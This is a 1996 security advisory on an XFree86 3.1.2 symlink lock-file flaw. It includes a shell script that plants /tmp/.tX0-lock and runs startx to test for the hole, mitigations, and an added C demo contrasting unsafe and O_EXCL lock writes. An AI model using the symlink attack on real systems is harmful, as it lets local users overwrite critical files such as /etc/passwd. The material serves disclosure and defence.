------------------------------------------------------------------------------
Title:          PHuNC Advisory 1996 #1 - Xfree86 3.1.2
Date:           6/4/1996
Problem:        Xfree86 3.1.2 contains a "bug" that can delete any file
Systems:        Any running Xfree86 3.1.2
Source of Hole: Anonymous Email
------------------------------------------------------------------------------

Problem:

Any machine running an Xfree86 3.1.2 server is open to an attack that can
overwrite any file on the system, including /etc/passwd. The original
contents of the file are lost, which can cause many problems on the system;
overwriting /etc/passwd, for instance, makes further logins fail.

Exploit:

The exploit relies on the fact that Xfree86 3.1.2 overwrites its lock file,
/tmp/.tX0-lock, even if it already exists. Because this version does no
checking for an existing file, an unprivileged user can create a symbolic
link called /tmp/.tX0-lock pointing to any file on the system. When the X
server is next run (it is installed setuid root, so the write happens with
root privileges), it writes to the lock file, which is actually a link, and
overwrites the designated file with its lock contents.

To make it easy to check for this "hole", make a shell script similar to the
following:

--- cut here, start code exploit.sh ---
#!/bin/sh
echo Running exploit to check the Xfree86 3.1.2 hole!
echo Creating file called /tmp/blah which will contain a few words.
echo "This version is NOT exploitable!" > /tmp/blah
# Plant the lock file name as a symlink to the victim file.
ln -s /tmp/blah /tmp/.tX0-lock
# Start the server; a vulnerable version writes its lock through the link.
startx
echo Now check /tmp/blah and if it says:
echo \"This version is NOT exploitable!\"
echo then the version you have is not exploitable!
echo Otherwise, it should have a few numbers, then it is
echo exploitable!
--- cut here, end of code exploit.sh ---

(The "few numbers" are the lock file contents the server writes, its process
ID. Remove the /tmp/.tX0-lock link after the test, or the next server start
will write through it again.)

Fix:

This hole can be fixed in a few ways. A temporary fix is to let only root
(the superuser) run the server: chmod 4700 the X server binary so that nobody
else can execute it. Another is to create a group specifically for the X
server, make the binary executable only by that group (mode 4710), and put
only trusted users in the group.
A permanent fix is to install the latest Xfree86, which can be downloaded
from http://www.x.org. A fixed server must refuse to write to a lock file
that already exists (a planted or dangling symlink included) instead of
blindly truncating whatever the name resolves to.

------------------------------------------------------------------------------
If you have a bug, hole, or exploit, email PHuNC at knight@catch22.com and
you will receive credit as due.

VENDORS: If you have your own advisories or patch releases, please email us
at knight@catch22.com as well, and we will give you credit as well.
------------------------------------------------------------------------------
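The following is an added example, not part of the PHuNC advisory and not
Xfree86 source code. It puts the unsafe lock-file write the advisory
describes (a plain truncating open that follows symlinks) beside the hardened
form (create-with-O_EXCL, plus O_NOFOLLOW), and runs both against the
advisory's scenario in a scratch directory under /tmp: plant a symlink named
.tX0-lock pointing at a victim file, then let each writer "start the server".
The function names, the scratch directory, the victim file and its contents
are assumptions made for the demonstration; the lock file name and the
PID-in-lock-file convention follow the advisory.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern (assumed to mirror the 3.1.2 behaviour): fopen(...,"w")
 * truncates whatever the path resolves to, following symlinks, so a link
 * planted at the lock file name redirects the write to any file. */
static int write_lock_unsafe(const char *lockpath, pid_t pid)
{
    FILE *f = fopen(lockpath, "w");
    if (!f) return -1;
    fprintf(f, "%10d\n", (int)pid);   /* lock contents: the server's PID */
    fclose(f);
    return 0;
}

/* Hardened pattern: O_CREAT|O_EXCL refuses to open an existing path, and a
 * symlink (dangling or not) counts as existing, so the write never goes
 * through a link. O_NOFOLLOW is a second line of defence for the case where
 * someone later drops O_EXCL. A failure here must abort the start-up, not
 * fall back to a plain open. */
static int write_lock_safe(const char *lockpath, pid_t pid)
{
    int fd = open(lockpath, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
    if (fd < 0) return -1;            /* EEXIST: a lock (or a trap) is already there */
    char buf[32];
    int n = snprintf(buf, sizeof buf, "%10d\n", (int)pid);
    if (write(fd, buf, (size_t)n) != n) { close(fd); unlink(lockpath); return -1; }
    close(fd);
    return 0;
}

/* Reads up to cap-1 bytes of a file into buf (NUL-terminated); -1 on error. */
static long read_file(const char *path, char *buf, size_t cap)
{
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    size_t n = fread(buf, 1, cap - 1, f);
    fclose(f);
    buf[n] = '\0';
    return (long)n;
}

/* Plays the advisory's exploit.sh against one writer in a scratch directory
 * (assumed layout: <dir>/victim is the file to protect, <dir>/.tX0-lock the
 * planted link). Returns 1 if the victim was clobbered, 0 if it survived,
 * -1 if setup failed; *writer_rc receives the writer's own return value. */
static int simulate(int (*writer)(const char *, pid_t), int *writer_rc)
{
    char dir[] = "/tmp/xlock-demo-XXXXXX";
    if (!mkdtemp(dir)) return -1;
    char target[256], lock[256], contents[64];
    snprintf(target, sizeof target, "%s/victim", dir);
    snprintf(lock, sizeof lock, "%s/.tX0-lock", dir);

    FILE *f = fopen(target, "w");                 /* constructed victim file */
    if (!f) return -1;
    fputs("This version is NOT exploitable!\n", f);
    fclose(f);

    if (symlink(target, lock) != 0) return -1;    /* the attacker's "ln -s" */

    *writer_rc = writer(lock, getpid());          /* the X server's "startx" */

    int clobbered = read_file(target, contents, sizeof contents) < 0 ||
                    strcmp(contents, "This version is NOT exploitable!\n") != 0;

    unlink(lock); unlink(target); rmdir(dir);
    return clobbered;
}

static const char *verdict(int r)
{
    return r < 0 ? "setup failed" : r ? "CLOBBERED" : "intact";
}

int main(void)
{
    int rc = 0;
    printf("fopen(\"w\") writer: victim %s, writer returned %d\n",
           verdict(simulate(write_lock_unsafe, &rc)), rc);
    printf("O_EXCL writer:     victim %s, writer returned %d\n",
           verdict(simulate(write_lock_safe, &rc)), rc);
    return 0;
}
```

Run it as an ordinary user: the first line reports the victim clobbered with
the PID (the "few numbers" of the advisory), the second reports it intact and
the writer refusing with EEXIST. Note that the O_EXCL refusal is also what a
legitimate stale lock produces, so the server has to distinguish the two by
reading the existing file rather than by deleting it and retrying, which would
reopen the race.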